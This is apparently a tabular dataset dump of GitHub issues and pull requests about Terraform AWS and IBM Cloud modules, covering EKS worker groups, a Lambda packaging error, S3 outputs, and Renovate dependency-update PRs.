id
stringlengths 4
10
| text
stringlengths 4
2.14M
| source
stringclasses 2
values | created
timestamp[s]date 2001-05-16 21:05:09
2025-01-01 03:38:30
| added
stringdate 2025-04-01 04:05:38
2025-04-01 07:14:06
| metadata
dict |
---|---|---|---|---|---|
947038482
|
"launch_template_id" and "launch_template_version" inside "worker_groups_launch_template" block
Is it possible to pass " launch_template_id" and "launch_template_version" inside "worker_groups_launch_template" block or is it allowed only inside a Node Group ?
Even if I pass the Launch Template details, it is still taking some default values (E.g.: Instnce type as m4.large) for the EC2 instance worker nodes.
terraform -v
Terraform v1.0.0
on windows_amd64
aws = {
source = "hashicorp/aws"
version = "3.50.0"
}
module "eks" {
source = "terraform-aws-modules/eks/aws"
version = "17.1.0"
cluster_name = local.eks_cluster_name
cluster_version = var.eks_cluster_version
vpc_id = module.vpc.vpc_id
subnets = module.vpc.private_subnets
worker_groups_launch_template = [
{
name = "worker-group-1"
asg_desired_capacity = var.eks_worker_nodes
asg_min_size = var.eks_worker_nodes
asg_max_size = var.eks_worker_nodes
launch_template_id = aws_launch_template.eks_launch_template.id
launch_template_version = aws_launch_template.eks_launch_template.latest_version
}
]
cluster_endpoint_private_access = true
write_kubeconfig = true
kubeconfig_output_path = "./kubeconfig/"
tags = local.tags
}
If it is not supported, is there any way to define an additional ebs volume ?
Please take a look into https://github.com/terraform-aws-modules/terraform-aws-eks/blob/master/examples/launch_templates/main.tf this is showing how to customize worker groups
regarding
it is still taking some default values (E.g.: Instnce type as m4.large) for the EC2 instance worker nodes
this is because you dont specify a instance_type` in worker_groups_launch_template so assumes some defaults from this map https://github.com/terraform-aws-modules/terraform-aws-eks/blob/c2bd137152945317124c4cded258f12662d267f4/local.tf#L51-L132
|
gharchive/issue
| 2021-07-18T13:47:39 |
2025-04-01T04:36:03.178635
|
{
"authors": [
"daroga0002",
"sujeetkp"
],
"repo": "terraform-aws-modules/terraform-aws-eks",
"url": "https://github.com/terraform-aws-modules/terraform-aws-eks/issues/1486",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1612104033
|
Lambda packaging suddenly failing.
Description
I can't honestly explain what is going on because it worked Friday and today it doesn't. I see no significant changes to anything related to this code. Already tried backing out to aws provider 4.56.0. Same exact messages.
│ Error: External Program Execution Failed
│
│ with module.edge_lambda.data.external.archive_prepare[0],
│ on .terraform/modules/edge_lambda/package.tf line 10, in data "external" "archive_prepare":
│ 10: program = [local.python, "${path.module}/package.py", "prepare"]
│
│ The data source received an unexpected error while attempting to execute the program.
│
│ Program: /usr/local/bin/python3
│ Error Message: Traceback (most recent call last):
│ File "/Users/spliskamatyshak/Documents/GitHub/discover-api/infrastructure/pipelines/acct-infra/.terraform/modules/edge_lambda/package.py", line 1627, in <module>
│ main()
│ File "/Users/spliskamatyshak/Documents/GitHub/discover-api/infrastructure/pipelines/acct-infra/.terraform/modules/edge_lambda/package.py", line 1623, in main
│ exit(args.command(args))
│ ^^^^^^^^^^^^^^^^^^
│ File "/Users/spliskamatyshak/Documents/GitHub/discover-api/infrastructure/pipelines/acct-infra/.terraform/modules/edge_lambda/package.py", line 1433, in prepare_command
│ content_hash.update(hash_extra.encode())
│ ^^^^^^^^^^^^^^^^^
│ AttributeError: 'NoneType' object has no attribute 'encode'
│
│ State: exit status 1
If your request is for a new feature, please use the Feature request template.
[*] ✋ I have searched the open/closed issues and my issue is not listed.
⚠️ Note
Before you submit an issue, please perform the following first:
Remove the local .terraform directory (! ONLY if state is stored remotely, which hopefully you are following that best practice!): rm -rf .terraform/
Re-initialize the project root to pull down modules: terraform init
Re-attempt your terraform plan or apply and check if the issue still persists
Versions
Module version [Required]:
4.10.1
Terraform version:
1.3.9
Provider version(s):
provider registry.terraform.io/hashicorp/aws v4.57.0
provider registry.terraform.io/hashicorp/external v2.3.0
provider registry.terraform.io/hashicorp/local v2.3.0
provider registry.terraform.io/hashicorp/null v3.2.1
Reproduction Code [Required]
Steps to reproduce the behavior:
module "edge_lambda" {
source = "terraform-aws-modules/lambda/aws"
version = "~> 4.10"
function_name = "within3-discover-headers"
description = "Edge lambda for auth0"
handler = "index.header"
runtime = "nodejs16.x"
lambda_at_edge = true
source_path = "${path.root}/../../fixtures/edge"
}
Expected behavior
Should package the lambda as it has until today.
Actual behavior
See error above.
Terminal Output Screenshot(s)
Additional context
I am also facing this issue for our prod deployment on version 1.38.0.
Did anyone found the root cause or fix for this issue?
It appears this could be related to the external provider used for the data source.
Link to relevant issue and discussion: https://github.com/hashicorp/terraform-provider-external/issues/193
Setting the hash_extra input to an arbitrary value got around this issue.
Updating to v2.3.1 of the external provider fixed the issue for my team.
If you are obtaining the latest provider/not setting constraints, the next deployment should detect this from registry.
I ended up blowing away my repo locally and recloning before things started working again. I'm guessing ultimately, it was the external provider update that actually fixed this.
|
gharchive/issue
| 2023-03-06T19:52:00 |
2025-04-01T04:36:03.189253
|
{
"authors": [
"drewclardy",
"kunalmbm",
"pneigel-ca",
"spliskamatyshak-w3"
],
"repo": "terraform-aws-modules/terraform-aws-lambda",
"url": "https://github.com/terraform-aws-modules/terraform-aws-lambda/issues/430",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
411894436
|
Missing support for publicly accessible instances
It would be nice if the module supports the publicly_accessible boolean in order to allow access from outside of the VPC.
It is already there, publicly_accessible = true
Completly missed it, my bad
No problems :)
|
gharchive/issue
| 2019-02-19T12:14:37 |
2025-04-01T04:36:03.191477
|
{
"authors": [
"Blokje5",
"antonbabenko"
],
"repo": "terraform-aws-modules/terraform-aws-rds-aurora",
"url": "https://github.com/terraform-aws-modules/terraform-aws-rds-aurora/issues/26",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
678938981
|
Aurora Serverless
How can I provision Aurora serverless using this module?
Hi @sachin-101 !
Check out another module's example - https://github.com/terraform-aws-modules/terraform-aws-rds-aurora/tree/master/examples/serverless
Thanks @antonbabenko . Would be awesome if you changed the link for Aurora Serverless (on https://serverless.tf) to point to the above examples rather than this repo's examples.
Good point! Updated.
|
gharchive/issue
| 2020-08-14T06:39:58 |
2025-04-01T04:36:03.193852
|
{
"authors": [
"antonbabenko",
"sachin-101"
],
"repo": "terraform-aws-modules/terraform-aws-rds",
"url": "https://github.com/terraform-aws-modules/terraform-aws-rds/issues/248",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
407319112
|
Create branch tf_0.12
Please, create a branch to keep the module files related to the Terraform 0.12 version.
Submit PR to master branch.
|
gharchive/issue
| 2019-02-06T16:27:29 |
2025-04-01T04:36:03.194751
|
{
"authors": [
"antonbabenko",
"bamaralf"
],
"repo": "terraform-aws-modules/terraform-aws-s3-bucket",
"url": "https://github.com/terraform-aws-modules/terraform-aws-s3-bucket/issues/2",
"license": "apache-2.0",
"license_type": "permissive",
"license_source": "bigquery"
}
|
871058733
|
Bug on s3_bucket_id output
Description
Please provide a clear and concise description of the issue you are encountering, your current setup, and what steps led up to the issue. If you can provide a reproduction, that will help tremendously.
⚠️ Note
Before you submit an issue, please perform the following first:
Remove the local .terraform directory (! ONLY if state is stored remotely, which hopefully you are following that best practice!): rm -rf .terraform/
Re-initialize the project root to pull down modules: terraform init
Re-attempt your terraform plan or apply and check if the issue still persists
Versions
Terraform:
Terraform v0.15.0
Provider(s):
provider registry.terraform.io/hashicorp/aws v3.37.0
Module:
module "s3_static_site" {
source = "terraform-aws-modules/s3-bucket/aws"
version = "~> 2.0"
...
}
Reproduction
Steps to reproduce the behavior:
data "aws_iam_policy_document" "cdn_s3_policy" {
statement {
actions = ["s3:GetObject"]
resources = ["${module.s3_static_site.s3_bucket_arn}/*"]
principals {
type = "AWS"
identifiers = module.cdn.cloudfront_origin_access_identity_iam_arns
}
}
}
resource "aws_s3_bucket_policy" "cdn_bucket_policy" {
bucket = module.s3_static_site.s3_bucket_id
policy = data.aws_iam_policy_document.cdn_s3_policy.json
}
The actual error during apply attempt:
│
│ on static_site.tf line 77, in resource "aws_s3_bucket_policy" "cdn_bucket_policy":
│ 77: bucket = module.s3_static_site.s3_bucket_id
│ ├────────────────
│ │ module.s3_static_site.s3_bucket_id is a object, known only after apply
│
│ Inappropriate value for attribute "bucket": string required.
yes
yes
Code Snippet to Reproduce
Expected behavior
The name of the bucket is should be a string.
Actual behavior
Terminal Output Screenshot(s)
Additional context
It should be:
output "s3_bucket_id" {
description = "The name of the bucket."
value = element(aws_s3_bucket.this.*.id, [""]), 0)
}
I am not sure what is the problem here but please fill in the template when opening an issue (not just copy-paste).
Sure, let me try again then.
|
gharchive/issue
| 2021-04-29T14:10:25 |
2025-04-01T04:36:03.201293
|
{
"authors": [
"antonbabenko",
"atrakic"
],
"repo": "terraform-aws-modules/terraform-aws-s3-bucket",
"url": "https://github.com/terraform-aws-modules/terraform-aws-s3-bucket/issues/89",
"license": "apache-2.0",
"license_type": "permissive",
"license_source": "bigquery"
}
|
2328472095
|
fix(deps): update terraform terraform-ibm-modules/cos/ibm to v8.3.1
This PR contains the following updates:
Package
Type
Update
Change
terraform-ibm-modules/cos/ibm (source)
module
minor
8.2.10 -> 8.3.1
Release Notes
terraform-ibm-modules/terraform-ibm-cos (terraform-ibm-modules/cos/ibm)
v8.3.1
Compare Source
Bug Fixes
fixed bug in validation of resource_keys roles. It was incorrectly checking for None an now it correctly checks for NONE (#632) (5473ee2)
v8.3.0
Compare Source
Features
add support to scope resource keys to 'None' role (#626) (49cd08a)
v8.2.14
Compare Source
Bug Fixes
deps: update terraform terraform-ibm-modules/kms-all-inclusive/ibm to v4.13.1 (#630) (078cc08)
v8.2.13
Compare Source
Bug Fixes
deps: update terraform-module (#627) (122e15f)
v8.2.12
Compare Source
Bug Fixes
deps: update terraform ibm to latest for the deployable architecture solution (#628) (e93be43)
v8.2.11
Compare Source
Bug Fixes
fix bug related to missing KMS auth policy (#621) (a395e83)
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, check this box
This PR has been generated by Renovate Bot.
/run pipeline
/run pipeline
/run pipeline
/run pipeline
/run pipeline
/run pipeline
:tada: This PR is included in version 1.0.10 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2024-05-31T19:32:51 |
2025-04-01T04:36:03.219143
|
{
"authors": [
"terraform-ibm-modules-dev",
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/sample-deployable-architectures",
"url": "https://github.com/terraform-ibm-modules/sample-deployable-architectures/pull/18",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1502832706
|
chore(deps): update common-dev-assets digest to 3e33725
This PR contains the following updates:
Package
Update
Change
common-dev-assets
digest
da6272e -> 3e33725
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, click this checkbox.
This PR has been generated by Renovate Bot.
:tada: This PR is included in version 1.1.1 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2022-12-19T12:05:57 |
2025-04-01T04:36:03.224706
|
{
"authors": [
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-cis",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-cis/pull/22",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1834953843
|
fix: add sleep to wait for sg creation
Description
https://github.com/terraform-ibm-modules/terraform-ibm-client-to-site-vpn/issues/45
Release required?
Identify the type of release. For information about the changes in a semantic versioning release, see Release versioning.
[ ] No release
[ ] Patch release (x.x.X)
[ ] Minor release (x.X.x)
[ ] Major release (X.x.x)
Release notes content
If a release is required, replace this text with information that users need to know about the release. Write the release notes to help users understand the changes, and include information about how to update from the previous version.
Your notes help the merger write the commit message for the PR that is published in the release notes for the module.
Run the pipeline
If the CI pipeline doesn't run when you create the PR, the PR requires a user with GitHub collaborators access to run the pipeline.
Run the CI pipeline when the PR is ready for review and you expect tests to pass. Add a comment to the PR with the following text:
/run pipeline
Checklist for reviewers
[ ] If relevant, a test for the change is included or updated with this PR.
[ ] If relevant, documentation for the change is included or updated with this PR.
Merge actions for mergers
Use a relevant conventional commit message that is based on the PR contents and any release notes provided by the PR author. The commit message determines whether a new version of the module is needed, and if so, which semver increment to use (major, minor, or patch).
Merge by using "Squash and merge".
/run pipeline
@jor2 Thanks for the PR. Firstly, this PR needs to be merged to unblock pipeline. Secondly, please be aware that in this PR, the landing-zone example is moving directories. I may actually bundle this change into that PR now (maybe you can review it?) and close this PR to avoid conflicts
@jor2 Ive included the workaround in https://github.com/terraform-ibm-modules/terraform-ibm-client-to-site-vpn/pull/49 - can you please review?
Closing this issue
|
gharchive/pull-request
| 2023-08-03T12:20:24 |
2025-04-01T04:36:03.231762
|
{
"authors": [
"jor2",
"ocofaigh"
],
"repo": "terraform-ibm-modules/terraform-ibm-client-to-site-vpn",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-client-to-site-vpn/pull/48",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
2061108148
|
chore(deps): update common-dev-assets digest to 4821104
This PR contains the following updates:
Package
Update
Change
common-dev-assets
digest
e1289a9 -> 4821104
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, check this box
This PR has been generated by Renovate Bot.
/run pipeline
:tada: This PR is included in version 1.1.6 :tada:
The release is available on:
GitHub release
v1.1.6
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2023-12-31T16:19:28 |
2025-04-01T04:36:03.238103
|
{
"authors": [
"terraform-ibm-modules-dev",
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-cloudant",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-cloudant/pull/67",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
2103228680
|
chore(deps): update ci dependencies
This PR contains the following updates:
Package
Type
Update
Change
common-dev-assets
digest
00d2055 -> 6980d55
github.com/terraform-ibm-modules/ibmcloud-terratest-wrapper
require
patch
v1.27.1 -> v1.27.2
Release Notes
terraform-ibm-modules/ibmcloud-terratest-wrapper (github.com/terraform-ibm-modules/ibmcloud-terratest-wrapper)
v1.27.2
Compare Source
Bug Fixes
deps: update module github.com/ibm/platform-services-go-sdk to v0.56.3 (#749) (2f431a0)
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, check this box
This PR has been generated by Renovate Bot.
/run pipeline
/run pipeline
:tada: This PR is included in version 1.0.4 :tada:
The release is available on:
GitHub release
v1.0.4
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2024-01-27T05:00:03 |
2025-04-01T04:36:03.247657
|
{
"authors": [
"terraform-ibm-modules-dev",
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-hpc",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-hpc/pull/110",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1615701506
|
chore(deps): update common-dev-assets digest to e991e92
This PR contains the following updates:
Package
Update
Change
common-dev-assets
digest
c11b977 -> e991e92
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, check this box
This PR has been generated by Renovate Bot.
:tada: This PR is included in version 1.1.2 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2023-03-08T18:11:23 |
2025-04-01T04:36:03.253330
|
{
"authors": [
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-icd-mongodb",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-icd-mongodb/pull/49",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1552342595
|
chore(deps): update common-dev-assets digest to f46cdab
This PR contains the following updates:
Package
Update
Change
common-dev-assets
digest
eda55fa -> f46cdab
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, click this checkbox.
This PR has been generated by Renovate Bot.
:tada: This PR is included in version 2.0.0 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2023-01-23T00:07:35 |
2025-04-01T04:36:03.258628
|
{
"authors": [
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-icse-key-management",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-icse-key-management/pull/183",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1510448274
|
chore(deps): update common-dev-assets digest to 3e70ea2
This PR contains the following updates:
Package
Update
Change
common-dev-assets
digest
d8a541e -> 3e70ea2
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, click this checkbox.
This PR has been generated by Renovate Bot.
:tada: This PR is included in version 1.0.4 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2022-12-26T00:09:47 |
2025-04-01T04:36:03.264324
|
{
"authors": [
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-icse-network-acl",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-icse-network-acl/pull/81",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
2034287198
|
chore(deps): update module github.com/terraform-ibm-modules/ibmcloud-terratest-wrapper to v1.25.6
This PR contains the following updates:
Package
Type
Update
Change
github.com/terraform-ibm-modules/ibmcloud-terratest-wrapper
require
patch
v1.25.5 -> v1.25.6
Release Notes
terraform-ibm-modules/ibmcloud-terratest-wrapper (github.com/terraform-ibm-modules/ibmcloud-terratest-wrapper)
v1.25.6
Compare Source
Bug Fixes
deps: update module github.com/go-git/go-git/v5 to v5.11.0 (#714) (021df86)
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, check this box
This PR has been generated by Renovate Bot.
/run pipeline
:tada: This PR is included in version 2.5.0 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2023-12-10T09:19:47 |
2025-04-01T04:36:03.273193
|
{
"authors": [
"terraform-ibm-modules-dev",
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-key-protect",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-key-protect/pull/489",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1772364450
|
chore(deps): update common-dev-assets digest to 54b3d7e
This PR contains the following updates:
Package
Update
Change
common-dev-assets
digest
593e4fb -> 54b3d7e
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, check this box
This PR has been generated by Renovate Bot.
/run pipeline
/run pipeline
/run pipeline
|
gharchive/pull-request
| 2023-06-24T01:01:02 |
2025-04-01T04:36:03.278163
|
{
"authors": [
"terraform-ibm-modules-dev",
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-kms-key-ring",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-kms-key-ring/pull/395",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
2458862764
|
chore(deps): update terraform terraform-ibm-modules/key-protect/ibm to v2.8.2
This PR contains the following updates:
Package
Type
Update
Change
terraform-ibm-modules/key-protect/ibm (source)
module
patch
2.8.1 -> 2.8.2
Release Notes
terraform-ibm-modules/terraform-ibm-key-protect (terraform-ibm-modules/key-protect/ibm)
v2.8.2
Compare Source
Bug Fixes
deps: update terraform terraform-ibm-modules/cbr/ibm to v1.23.3 (#603) (ba60906)
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, check this box
This PR has been generated by Renovate Bot.
/run pipeline
:tada: This PR is included in version 2.5.0 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2024-08-10T02:44:32 |
2025-04-01T04:36:03.286911
|
{
"authors": [
"terraform-ibm-modules-dev",
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-kms-key-ring",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-kms-key-ring/pull/612",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
2328700647
|
chore(deps): update ci dependencies
This PR contains the following updates:
Package
Type
Update
Change
common-dev-assets
digest
b4db5fd -> 0e4338f
terraform-ibm-modules/common-pipeline-assets
action
patch
v1.22.1 -> v1.22.2
Release Notes
terraform-ibm-modules/common-pipeline-assets (terraform-ibm-modules/common-pipeline-assets)
v1.22.2
Compare Source
Bug Fixes
replace ORG_READER_GH_TOKEN with GITHUB_TOKEN (#693)
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, check this box
This PR has been generated by Renovate Bot.
/run pipeline
:tada: This PR is included in version 1.2.4 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2024-05-31T23:17:15 |
2025-04-01T04:36:03.295406
|
{
"authors": [
"terraform-ibm-modules-dev",
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-kms-key",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-kms-key/pull/587",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1510449055
|
chore(deps): update common-dev-assets digest to 668972c
This PR contains the following updates:
Package
Update
Change
common-dev-assets
digest
d8a541e -> 668972c
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, click this checkbox.
This PR has been generated by Renovate Bot.
:tada: This PR is included in version 1.13.1 :tada:
The release is available on:
GitHub release
v1.13.1
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2022-12-26T00:12:11 |
2025-04-01T04:36:03.301362
|
{
"authors": [
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-landing-zone",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-landing-zone/pull/232",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
2217176501
|
chore(deps): update module github.com/terraform-ibm-modules/ibmcloud-terratest-wrapper to v1.30.3
This PR contains the following updates:
Package
Type
Update
Change
github.com/terraform-ibm-modules/ibmcloud-terratest-wrapper
require
patch
v1.30.2 -> v1.30.3
Release Notes
terraform-ibm-modules/ibmcloud-terratest-wrapper (github.com/terraform-ibm-modules/ibmcloud-terratest-wrapper)
v1.30.3
Compare Source
Bug Fixes
deps: update module github.com/go-git/go-git/v5 to v5.12.0 (#787) (9c597d6)
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, check this box
This PR has been generated by Renovate Bot.
/run pipeline
/run pipeline
/run pipeline
:tada: This PR is included in version 5.20.4 :tada:
The release is available on:
GitHub release
v5.20.4
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2024-03-31T20:46:49 |
2025-04-01T04:36:03.310603
|
{
"authors": [
"ocofaigh",
"terraform-ibm-modules-dev",
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-landing-zone",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-landing-zone/pull/759",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
2265693263
|
Do not use external data blocks to execute long running script
The code is currently using an external data block for install_verify and maximo_admin_url. These run on every terraform plan, and it seems like they take a LONG time to execute. For example, I see this one took 90mins: module.existing_cluster.data.external.install_verify: Read complete after 1h30m18s [id=-]
This is not something you want to happen on terraform plan! For it to only run on apply, you should use a null_resource block (like you did for pipeline_verify resource)
Being addressed in https://github.com/terraform-ibm-modules/terraform-ibm-mas/pull/56
|
gharchive/issue
| 2024-04-26T12:34:57 |
2025-04-01T04:36:03.312615
|
{
"authors": [
"ocofaigh"
],
"repo": "terraform-ibm-modules/terraform-ibm-mas",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-mas/issues/65",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
2286827690
|
fix: added for k8S_31 vulnerability
Issue: https://github.com/terraform-ibm-modules/terraform-ibm-mas/issues/16
Description
Fix CKV_K8S_31
Removed the commented code to give better readibility
Release required?
[ ] No release
[X] Patch release (x.x.X)
[ ] Minor release (x.X.x)
[ ] Major release (X.x.x)
Release notes content
Run the pipeline
If the CI pipeline doesn't run when you create the PR, the PR requires a user with GitHub collaborators access to run the pipeline.
Run the CI pipeline when the PR is ready for review and you expect tests to pass. Add a comment to the PR with the following text:
/run pipeline
Checklist for reviewers
[ ] If relevant, a test for the change is included or updated with this PR.
[ ] If relevant, documentation for the change is included or updated with this PR.
For mergers
Use a conventional commit message to set the release level. Follow the guidelines.
Include information that users need to know about the PR in the commit message. The commit message becomes part of the GitHub release notes.
Use the Squash and merge option.
/run pipeline
/run pipeline
/run pipeline
:tada: This PR is included in version 1.7.2 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2024-05-09T03:37:31 |
2025-04-01T04:36:03.319652
|
{
"authors": [
"ocofaigh",
"padmankosalaram",
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-mas",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-mas/pull/101",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1303273176
|
chore(deps): update common-dev-assets digest to a79f9ae
This PR contains the following updates:
Package
Update
Change
common-dev-assets
digest
07e8c45 -> a79f9ae
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, click this checkbox.
This PR has been generated by Renovate Bot.
:tada: This PR is included in version 1.0.1 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2022-07-13T11:03:16 |
2025-04-01T04:36:03.324941
|
{
"authors": [
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-module-template",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-module-template/pull/44",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
2761638204
|
